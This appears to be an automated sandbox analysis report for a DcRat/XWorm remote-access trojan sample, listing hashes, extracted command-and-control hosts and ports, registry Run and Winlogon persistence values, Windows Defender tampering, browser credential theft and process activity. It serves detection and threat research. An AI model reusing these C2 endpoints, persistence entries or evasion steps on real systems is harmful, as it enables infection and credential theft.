dcrat | f965e1f1dcbf5efaa48c4e4d14691e6d378d9caec1352a85ee06d0ebfc43eca7

Analysis

max time kernel
147s
max time network
150s
platform
windows11-21h2_x64
resource
win11-20241007-en
resource tags

arch:x64arch:x86image:win11-20241007-enlocale:en-usos:windows11-21h2-x64system
submitted
21/01/2025, 07:02

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

XClient.exe
Size

33KB
MD5

843daa234f9b31c8f22c433971b0b086
SHA1

3c5f573f61e89c1a113fe907e5831e4be5dc5a4c
SHA256

f965e1f1dcbf5efaa48c4e4d14691e6d378d9caec1352a85ee06d0ebfc43eca7
SHA512

0da56ef71bebb09550cb666b6aa72d0f36e7aff12212da8fd523dd0450a211226d8106c136951d483813a76455b6ae12f711e6ea6513b3ff63c304b5d93fbfd0
SSDEEP

384:nl+PkjD9+E5MFs7iui8L7zKM42pfL3iB7OxVqWqKRApkFXBLTsOZwpGN2v99Ikun:l+CD93W03v42JiB70lVF49jXOjhwbi

Score

10^/10

dcrat xworm defense_evasion discovery execution infostealer persistence rat spyware stealer trojan

Malware Config

Extracted

Family

xworm

Version

5.0

general-hebrew.gl.at.ply.gg:24614

Mutex

cBWzGpKKIzANTO2p

Attributes

install_file
svchost.exe

aes.plain

Extracted

Family

xworm

Version

3.0

plus-loves.gl.at.ply.gg:59327

Attributes

Install_directory
%AppData%
install_file
USB.exe

Signatures

Contains code to disable Windows Defender 1 IoCs

A .NET executable tasked with disabling Windows Defender capabilities such as realtime monitoring, blocking at first seen, etc.

resource	yara_rule
behavioral1/memory/1072-207-0x000000001BBF0000-0x000000001BBFE000-memory.dmp	disable_win_def

DcRat
DarkCrystal(DC) is a new .NET RAT active since June 2019 capable of loading additional plugins.
rat infostealer dcrat
Dcrat family
dcrat

Detect Xworm Payload 3 IoCs

resource	yara_rule
behavioral1/memory/1072-1-0x0000000000580000-0x000000000058E000-memory.dmp	family_xworm
behavioral1/files/0x001c00000002aae3-9.dat	family_xworm
behavioral1/memory/4356-17-0x0000000000240000-0x0000000000274000-memory.dmp	family_xworm

Modifies WinLogon for persistence 2 TTPs 6 IoCs

persistence

Winlogon Helper DLL

T1547.004

Modify Registry

T1112

description	ioc	Process
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell = "explorer.exe, \"C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\dllhost.exe\", \"C:\\Program Files (x86)\\Google\\Update\\1.3.36.371\\XClient.exe\", \"C:\\Windows\\BitLockerDiscoveryVolumeContents\\dwm.exe\", \"C:\\Program Files (x86)\\Mozilla Maintenance Service\\logs\\System.exe\""	hyperSurrogateagentCrt.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell = "explorer.exe, \"C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\dllhost.exe\", \"C:\\Program Files (x86)\\Google\\Update\\1.3.36.371\\XClient.exe\", \"C:\\Windows\\BitLockerDiscoveryVolumeContents\\dwm.exe\", \"C:\\Program Files (x86)\\Mozilla Maintenance Service\\logs\\System.exe\", \"C:\\Program Files\\Mozilla Firefox\\dllhost.exe\""	hyperSurrogateagentCrt.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell = "explorer.exe, \"C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\dllhost.exe\", \"C:\\Program Files (x86)\\Google\\Update\\1.3.36.371\\XClient.exe\", \"C:\\Windows\\BitLockerDiscoveryVolumeContents\\dwm.exe\", \"C:\\Program Files (x86)\\Mozilla Maintenance Service\\logs\\System.exe\", \"C:\\Program Files\\Mozilla Firefox\\dllhost.exe\", \"C:\\HypercomponentCommon\\hyperSurrogateagentCrt.exe\""	hyperSurrogateagentCrt.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell = "explorer.exe, \"C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\dllhost.exe\""	hyperSurrogateagentCrt.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell = "explorer.exe, \"C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\dllhost.exe\", \"C:\\Program Files (x86)\\Google\\Update\\1.3.36.371\\XClient.exe\""	hyperSurrogateagentCrt.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell = "explorer.exe, \"C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\dllhost.exe\", \"C:\\Program Files (x86)\\Google\\Update\\1.3.36.371\\XClient.exe\", \"C:\\Windows\\BitLockerDiscoveryVolumeContents\\dwm.exe\""	hyperSurrogateagentCrt.exe

Modifies Windows Defender Real-time Protection settings 3 TTPs 1 IoCs

defense_evasion trojan

Modify Registry

T1112

Windows Service

T1543.003

Disable or Modify Tools

T1562.001

description	ioc	Process
Key created	\REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection	powershell.exe

Process spawned unexpected child process 18 IoCs

This typically indicates the parent process was compromised via an exploit or macro.

description	pid	pid_target	Process	procid_target
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	2872	4816	schtasks.exe	78
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	3100	4816	schtasks.exe	78
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	2408	4816	schtasks.exe	78
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	4396	4816	schtasks.exe	78
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	2876	4816	schtasks.exe	78
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	784	4816	schtasks.exe	78
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	2244	4816	schtasks.exe	78
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	1416	4816	schtasks.exe	78
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	436	4816	schtasks.exe	78
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	2836	4816	schtasks.exe	78
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	3024	4816	schtasks.exe	78
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	1516	4816	schtasks.exe	78
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	4488	4816	schtasks.exe	78
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	4304	4816	schtasks.exe	78
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	816	4816	schtasks.exe	78
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	5084	4816	schtasks.exe	78
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	4724	4816	schtasks.exe	78
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	4388	4816	schtasks.exe	78

Suspicious use of NtCreateUserProcessOtherParentProcess 1 IoCs

description	pid	Process	procid_target
PID 1072 created 688	1072	XClient.exe	7

Xworm
Xworm is a remote access trojan written in C#.
trojan rat xworm
Xworm family
xworm

Command and Scripting Interpreter: PowerShell 1 TTPs 7 IoCs

Run Powershell to modify Windows Defender settings to add exclusions for file extensions, paths, and processes.

execution

PowerShell

T1059.001

pid	Process
2144	powershell.exe
1736	powershell.exe
2420	powershell.exe
1204	powershell.exe
1616	powershell.exe
2072	powershell.exe
1764	powershell.exe

Downloads MZ/PE file

Drops startup file 2 IoCs

description	ioc	Process
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\XYR269UW2X56RGZ.lnk	XYR269UW2X56RGZ.exe
File opened for modification	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\XYR269UW2X56RGZ.lnk	XYR269UW2X56RGZ.exe

Executes dropped EXE 13 IoCs

pid	Process
4356	XYR269UW2X56RGZ.exe
1832	LRZDBCUY9IYTYZA.exe
5076	AJLF0KZUL5VL5NH.exe
644	hyperSurrogateagentCrt.exe
4396	System.exe
2972	TOBT66RBMHPKUAF.exe
4088	hyperSurrogateagentCrt.exe
328	XYR269UW2X56RGZ.exe
2060	XYR269UW2X56RGZ.exe.exe
4136	dllhost.exe
1636	XYR269UW2X56RGZ.exe
4768	XYR269UW2X56RGZ.exe.exe
1136	dllhost.exe

Reads user/profile data of web browsers 3 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
spyware stealer

Data from Local System
T1005

Credentials In Files
T1552.001

Credentials from Web Browsers
T1555.003

Adds Run key to start application 2 TTPs 13 IoCs

persistence

Registry Run Keys / Startup Folder

T1547.001

Modify Registry

T1112

description	ioc	Process
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\hyperSurrogateagentCrt = "\"C:\\HypercomponentCommon\\hyperSurrogateagentCrt.exe\""	hyperSurrogateagentCrt.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-556537508-2730415644-482548075-1000\Software\Microsoft\Windows\CurrentVersion\Run\XYR269UW2X56RGZ = "C:\\Users\\Admin\\AppData\\Roaming\\XYR269UW2X56RGZ.exe"	XYR269UW2X56RGZ.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\dllhost = "\"C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\dllhost.exe\""	hyperSurrogateagentCrt.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-556537508-2730415644-482548075-1000\Software\Microsoft\Windows\CurrentVersion\Run\XClient = "\"C:\\Program Files (x86)\\Google\\Update\\1.3.36.371\\XClient.exe\""	hyperSurrogateagentCrt.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\dwm = "\"C:\\Windows\\BitLockerDiscoveryVolumeContents\\dwm.exe\""	hyperSurrogateagentCrt.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-556537508-2730415644-482548075-1000\Software\Microsoft\Windows\CurrentVersion\Run\hyperSurrogateagentCrt = "\"C:\\HypercomponentCommon\\hyperSurrogateagentCrt.exe\""	hyperSurrogateagentCrt.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-556537508-2730415644-482548075-1000\Software\Microsoft\Windows\CurrentVersion\Run\dllhost = "\"C:\\Program Files\\Mozilla Firefox\\dllhost.exe\""	hyperSurrogateagentCrt.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\dllhost = "\"C:\\Program Files\\Mozilla Firefox\\dllhost.exe\""	hyperSurrogateagentCrt.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-556537508-2730415644-482548075-1000\Software\Microsoft\Windows\CurrentVersion\Run\dllhost = "\"C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\dllhost.exe\""	hyperSurrogateagentCrt.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\XClient = "\"C:\\Program Files (x86)\\Google\\Update\\1.3.36.371\\XClient.exe\""	hyperSurrogateagentCrt.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-556537508-2730415644-482548075-1000\Software\Microsoft\Windows\CurrentVersion\Run\dwm = "\"C:\\Windows\\BitLockerDiscoveryVolumeContents\\dwm.exe\""	hyperSurrogateagentCrt.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-556537508-2730415644-482548075-1000\Software\Microsoft\Windows\CurrentVersion\Run\System = "\"C:\\Program Files (x86)\\Mozilla Maintenance Service\\logs\\System.exe\""	hyperSurrogateagentCrt.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\System = "\"C:\\Program Files (x86)\\Mozilla Maintenance Service\\logs\\System.exe\""	hyperSurrogateagentCrt.exe

Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs

Web Service

T1102

flow	ioc
3	raw.githubusercontent.com
7	raw.githubusercontent.com

Drops file in System32 directory 2 IoCs

description	ioc	Process
File created	\??\c:\Windows\System32\CSCA3B127F226C34C09975C583660B9125C.TMP	csc.exe
File created	\??\c:\Windows\System32\qq0pbq.exe	csc.exe

Drops file in Program Files directory 9 IoCs

description	ioc	Process
File created	C:\Program Files\Mozilla Firefox\dllhost.exe	hyperSurrogateagentCrt.exe
File created	C:\Program Files\Mozilla Firefox\5940a34987c991	hyperSurrogateagentCrt.exe
File created	C:\Program Files (x86)\Google\Update\1.3.36.371\XClient.exe	hyperSurrogateagentCrt.exe
File created	C:\Program Files (x86)\Google\Update\1.3.36.371\cf20f2cf4406ff	hyperSurrogateagentCrt.exe
File created	C:\Program Files (x86)\Windows Sidebar\Gadgets\dllhost.exe	hyperSurrogateagentCrt.exe
File opened for modification	C:\Program Files\Mozilla Firefox\dllhost.exe	hyperSurrogateagentCrt.exe
File created	C:\Program Files (x86)\Mozilla Maintenance Service\logs\System.exe	hyperSurrogateagentCrt.exe
File created	C:\Program Files (x86)\Mozilla Maintenance Service\logs\27d1bcfc3c54e0	hyperSurrogateagentCrt.exe
File created	C:\Program Files (x86)\Windows Sidebar\Gadgets\5940a34987c991	hyperSurrogateagentCrt.exe

Drops file in Windows directory 3 IoCs

description	ioc	Process
File created	C:\Windows\BitLockerDiscoveryVolumeContents\6cb0b6c459d5d3	hyperSurrogateagentCrt.exe
File created	C:\Windows\OCR\en-us\fontdrvhost.exe	hyperSurrogateagentCrt.exe
File created	C:\Windows\BitLockerDiscoveryVolumeContents\dwm.exe	hyperSurrogateagentCrt.exe

Launches sc.exe 3 IoCs

Sc.exe is a Windows utlilty to control services on the system.

pid	Process
4588	sc.exe
3620	sc.exe
2432	sc.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

System Location Discovery: System Language Discovery 1 TTPs 6 IoCs

Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

discovery

System Language Discovery

T1614.001

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	LRZDBCUY9IYTYZA.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	WScript.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	TOBT66RBMHPKUAF.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	WScript.exe

Modifies data under HKEY_USERS 46 IoCs

description	ioc	Process
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CRLs	powershell.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "1"	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CTLs	powershell.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "0"	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\	powershell.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\IntranetName = "1"	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CRLs	powershell.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass = "1"	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\Certificates	powershell.exe

Modifies registry class 3 IoCs

description	ioc	Process
Key created	\REGISTRY\USER\S-1-5-21-556537508-2730415644-482548075-1000_Classes\Local Settings	LRZDBCUY9IYTYZA.exe
Key created	\REGISTRY\USER\S-1-5-21-556537508-2730415644-482548075-1000_Classes\Local Settings	hyperSurrogateagentCrt.exe
Key created	\REGISTRY\USER\S-1-5-21-556537508-2730415644-482548075-1000_Classes\Local Settings	TOBT66RBMHPKUAF.exe

Runs net.exe

Scheduled Task/Job: Scheduled Task 1 TTPs 19 IoCs

Schtasks is often used by malware for persistence or to perform post-infection execution.

persistence execution

Scheduled Task

T1053.005

pid	Process
2244	schtasks.exe
1516	schtasks.exe
816	schtasks.exe
5084	schtasks.exe
2876	schtasks.exe
4304	schtasks.exe
4724	schtasks.exe
2872	schtasks.exe
3100	schtasks.exe
2408	schtasks.exe
436	schtasks.exe
2836	schtasks.exe
3024	schtasks.exe
4488	schtasks.exe
1012	schtasks.exe
4396	schtasks.exe
784	schtasks.exe
1416	schtasks.exe
4388	schtasks.exe

Suspicious behavior: EnumeratesProcesses 64 IoCs

pid	Process
644	hyperSurrogateagentCrt.exe
644	hyperSurrogateagentCrt.exe
644	hyperSurrogateagentCrt.exe
644	hyperSurrogateagentCrt.exe
644	hyperSurrogateagentCrt.exe
644	hyperSurrogateagentCrt.exe
644	hyperSurrogateagentCrt.exe
644	hyperSurrogateagentCrt.exe
644	hyperSurrogateagentCrt.exe
644	hyperSurrogateagentCrt.exe
644	hyperSurrogateagentCrt.exe
644	hyperSurrogateagentCrt.exe
644	hyperSurrogateagentCrt.exe
644	hyperSurrogateagentCrt.exe
644	hyperSurrogateagentCrt.exe
644	hyperSurrogateagentCrt.exe
644	hyperSurrogateagentCrt.exe
644	hyperSurrogateagentCrt.exe
644	hyperSurrogateagentCrt.exe
644	hyperSurrogateagentCrt.exe
644	hyperSurrogateagentCrt.exe
644	hyperSurrogateagentCrt.exe
644	hyperSurrogateagentCrt.exe
644	hyperSurrogateagentCrt.exe
644	hyperSurrogateagentCrt.exe
644	hyperSurrogateagentCrt.exe
644	hyperSurrogateagentCrt.exe
644	hyperSurrogateagentCrt.exe
644	hyperSurrogateagentCrt.exe
644	hyperSurrogateagentCrt.exe
644	hyperSurrogateagentCrt.exe
644	hyperSurrogateagentCrt.exe
644	hyperSurrogateagentCrt.exe
644	hyperSurrogateagentCrt.exe
644	hyperSurrogateagentCrt.exe
644	hyperSurrogateagentCrt.exe
644	hyperSurrogateagentCrt.exe
644	hyperSurrogateagentCrt.exe
644	hyperSurrogateagentCrt.exe
644	hyperSurrogateagentCrt.exe
644	hyperSurrogateagentCrt.exe
644	hyperSurrogateagentCrt.exe
644	hyperSurrogateagentCrt.exe
644	hyperSurrogateagentCrt.exe
644	hyperSurrogateagentCrt.exe
644	hyperSurrogateagentCrt.exe
644	hyperSurrogateagentCrt.exe
644	hyperSurrogateagentCrt.exe
644	hyperSurrogateagentCrt.exe
644	hyperSurrogateagentCrt.exe
644	hyperSurrogateagentCrt.exe
644	hyperSurrogateagentCrt.exe
644	hyperSurrogateagentCrt.exe
644	hyperSurrogateagentCrt.exe
644	hyperSurrogateagentCrt.exe
644	hyperSurrogateagentCrt.exe
644	hyperSurrogateagentCrt.exe
644	hyperSurrogateagentCrt.exe
644	hyperSurrogateagentCrt.exe
644	hyperSurrogateagentCrt.exe
644	hyperSurrogateagentCrt.exe
644	hyperSurrogateagentCrt.exe
644	hyperSurrogateagentCrt.exe
644	hyperSurrogateagentCrt.exe

Suspicious use of AdjustPrivilegeToken 52 IoCs

description	pid	Process
Token: SeDebugPrivilege	1072	XClient.exe
Token: SeDebugPrivilege	4356	XYR269UW2X56RGZ.exe
Token: SeDebugPrivilege	4356	XYR269UW2X56RGZ.exe
Token: SeDebugPrivilege	5076	AJLF0KZUL5VL5NH.exe
Token: SeDebugPrivilege	644	hyperSurrogateagentCrt.exe
Token: SeDebugPrivilege	2420	powershell.exe
Token: SeDebugPrivilege	1736	powershell.exe
Token: SeDebugPrivilege	2144	powershell.exe
Token: SeDebugPrivilege	1204	powershell.exe
Token: SeDebugPrivilege	2072	powershell.exe
Token: SeDebugPrivilege	1616	powershell.exe
Token: SeDebugPrivilege	4396	System.exe
Token: SeDebugPrivilege	4088	hyperSurrogateagentCrt.exe
Token: SeDebugPrivilege	2060	XYR269UW2X56RGZ.exe.exe
Token: SeDebugPrivilege	4136	dllhost.exe
Token: SeDebugPrivilege	2848	whoami.exe
Token: SeDebugPrivilege	2848	whoami.exe
Token: SeDebugPrivilege	2848	whoami.exe
Token: SeDebugPrivilege	2848	whoami.exe
Token: SeDebugPrivilege	2848	whoami.exe
Token: SeDebugPrivilege	2848	whoami.exe
Token: SeDebugPrivilege	2848	whoami.exe
Token: SeDebugPrivilege	2848	whoami.exe
Token: SeDebugPrivilege	2848	whoami.exe
Token: SeDebugPrivilege	2848	whoami.exe
Token: SeDebugPrivilege	2848	whoami.exe
Token: SeDebugPrivilege	2848	whoami.exe
Token: SeDebugPrivilege	2848	whoami.exe
Token: SeDebugPrivilege	2848	whoami.exe
Token: SeDebugPrivilege	2848	whoami.exe
Token: SeDebugPrivilege	2848	whoami.exe
Token: SeDebugPrivilege	2848	whoami.exe
Token: SeDebugPrivilege	2848	whoami.exe
Token: SeDebugPrivilege	2848	whoami.exe
Token: SeDebugPrivilege	2848	whoami.exe
Token: SeDebugPrivilege	2848	whoami.exe
Token: SeDebugPrivilege	2848	whoami.exe
Token: SeDebugPrivilege	2848	whoami.exe
Token: SeDebugPrivilege	2848	whoami.exe
Token: SeDebugPrivilege	2848	whoami.exe
Token: SeDebugPrivilege	2848	whoami.exe
Token: SeDebugPrivilege	1764	powershell.exe
Token: SeDebugPrivilege	4108	whoami.exe
Token: SeDebugPrivilege	4108	whoami.exe
Token: SeDebugPrivilege	4108	whoami.exe
Token: SeDebugPrivilege	4108	whoami.exe
Token: SeDebugPrivilege	4108	whoami.exe
Token: SeDebugPrivilege	4108	whoami.exe
Token: SeDebugPrivilege	4108	whoami.exe
Token: SeDebugPrivilege	4108	whoami.exe
Token: SeDebugPrivilege	4768	XYR269UW2X56RGZ.exe.exe
Token: SeDebugPrivilege	1136	dllhost.exe

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 1072 wrote to memory of 4356	1072	XClient.exe	79
PID 1072 wrote to memory of 4356	1072	XClient.exe	79
PID 4356 wrote to memory of 1012	4356	XYR269UW2X56RGZ.exe	80
PID 4356 wrote to memory of 1012	4356	XYR269UW2X56RGZ.exe	80
PID 1072 wrote to memory of 1832	1072	XClient.exe	82
PID 1072 wrote to memory of 1832	1072	XClient.exe	82
PID 1072 wrote to memory of 1832	1072	XClient.exe	82
PID 1832 wrote to memory of 892	1832	LRZDBCUY9IYTYZA.exe	83
PID 1832 wrote to memory of 892	1832	LRZDBCUY9IYTYZA.exe	83
PID 1832 wrote to memory of 892	1832	LRZDBCUY9IYTYZA.exe	83
PID 1072 wrote to memory of 5076	1072	XClient.exe	84
PID 1072 wrote to memory of 5076	1072	XClient.exe	84
PID 892 wrote to memory of 4268	892	WScript.exe	85
PID 892 wrote to memory of 4268	892	WScript.exe	85
PID 892 wrote to memory of 4268	892	WScript.exe	85
PID 4268 wrote to memory of 644	4268	cmd.exe	87
PID 4268 wrote to memory of 644	4268	cmd.exe	87
PID 644 wrote to memory of 4708	644	hyperSurrogateagentCrt.exe	91
PID 644 wrote to memory of 4708	644	hyperSurrogateagentCrt.exe	91
PID 4708 wrote to memory of 1892	4708	csc.exe	93
PID 4708 wrote to memory of 1892	4708	csc.exe	93
PID 644 wrote to memory of 3284	644	hyperSurrogateagentCrt.exe	94
PID 644 wrote to memory of 3284	644	hyperSurrogateagentCrt.exe	94
PID 3284 wrote to memory of 4760	3284	csc.exe	96
PID 3284 wrote to memory of 4760	3284	csc.exe	96
PID 644 wrote to memory of 2420	644	hyperSurrogateagentCrt.exe	112
PID 644 wrote to memory of 2420	644	hyperSurrogateagentCrt.exe	112
PID 644 wrote to memory of 1736	644	hyperSurrogateagentCrt.exe	113
PID 644 wrote to memory of 1736	644	hyperSurrogateagentCrt.exe	113
PID 644 wrote to memory of 2144	644	hyperSurrogateagentCrt.exe	114
PID 644 wrote to memory of 2144	644	hyperSurrogateagentCrt.exe	114
PID 644 wrote to memory of 1204	644	hyperSurrogateagentCrt.exe	115
PID 644 wrote to memory of 1204	644	hyperSurrogateagentCrt.exe	115
PID 644 wrote to memory of 1616	644	hyperSurrogateagentCrt.exe	116
PID 644 wrote to memory of 1616	644	hyperSurrogateagentCrt.exe	116
PID 644 wrote to memory of 2072	644	hyperSurrogateagentCrt.exe	117
PID 644 wrote to memory of 2072	644	hyperSurrogateagentCrt.exe	117
PID 644 wrote to memory of 2036	644	hyperSurrogateagentCrt.exe	124
PID 644 wrote to memory of 2036	644	hyperSurrogateagentCrt.exe	124
PID 2036 wrote to memory of 4588	2036	cmd.exe	126
PID 2036 wrote to memory of 4588	2036	cmd.exe	126
PID 2036 wrote to memory of 4916	2036	cmd.exe	127
PID 2036 wrote to memory of 4916	2036	cmd.exe	127
PID 2036 wrote to memory of 4396	2036	cmd.exe	128
PID 2036 wrote to memory of 4396	2036	cmd.exe	128
PID 1072 wrote to memory of 2972	1072	XClient.exe	129
